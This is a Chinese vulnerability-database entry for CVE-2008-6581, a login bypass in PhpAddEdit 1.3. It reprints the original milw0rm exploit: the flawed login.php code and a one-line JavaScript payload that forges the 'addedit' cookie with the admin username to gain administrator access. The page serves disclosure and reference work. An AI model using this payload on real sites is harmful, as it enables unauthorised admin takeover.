phpAddEdit 'login.php' 身份认证绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117010 漏洞类型 授权问题
发布时间 2008-12-11 更新时间 2009-04-02
CVE编号 CVE-2008-6581 CNNVD-ID CNNVD-200904-032
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7418
https://cxsecurity.com/issue/WLB-2009040103
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-032
|漏洞详情
PhpAddEdit1.3版本中的login.php允许远程攻击者通过设置addeditcookie参数,绕过身份认证和获得管理访问权限。
|漏洞EXP
-------------------------------------
   PhpAddEdit 1.3 Login By Pass 
-------------------------------------

Found By: x0r ( Evolution Team )
Email: andry2000@hotmail.it
-------------------------------------

Bug In: Addedit-login.php

		if (!$login_error) {
			// --- Set admin cookie so favorite form field will show up when I use
the site...
			if ($_POST["rememberme"]) {
				$expire = mktime(0,0,0,date("m"),date("d")+120,date("Y"));
				setcookie("addedit", $_POST["adminuser"], $expire, "/", "", 0);
			} else {
				setcookie("addedit", $_POST["adminuser"]);
			}
			Header("Location:  ./");
		}
	}
	
Ci basta conoscere l'username dell'admin per bypassare il login :P ^ ^
-------------------------------------

Exploit:

javascript:document.cookie = "addedit=[adminuser]; path=/";

es:

javascript:document.cookie = "addedit=x0r; path=/";
--------------------------------------
Live Demo: http://www.phpaddedit.com/demo/
--------------------------------------
Greetz: Amore oggi +65 ti amo troppo.

# milw0rm.com [2008-12-11]
|参考资料

来源:www.phpaddedit.com
链接:http://www.phpaddedit.com/page/new/
来源:XF
名称:phpaddedit-adminuser-cookie-security-bypass(47264)
链接:http://xforce.iss.net/xforce/xfdb/47264
来源:BID
名称:32779
链接:http://www.securityfocus.com/bid/32779
来源:MILW0RM
名称:7418
链接:http://www.milw0rm.com/exploits/7418
来源:SECUNIA
名称:33124
链接:http://secunia.com/advisories/33124
来源:OSVDB
名称:50674
链接:http://osvdb.org/50674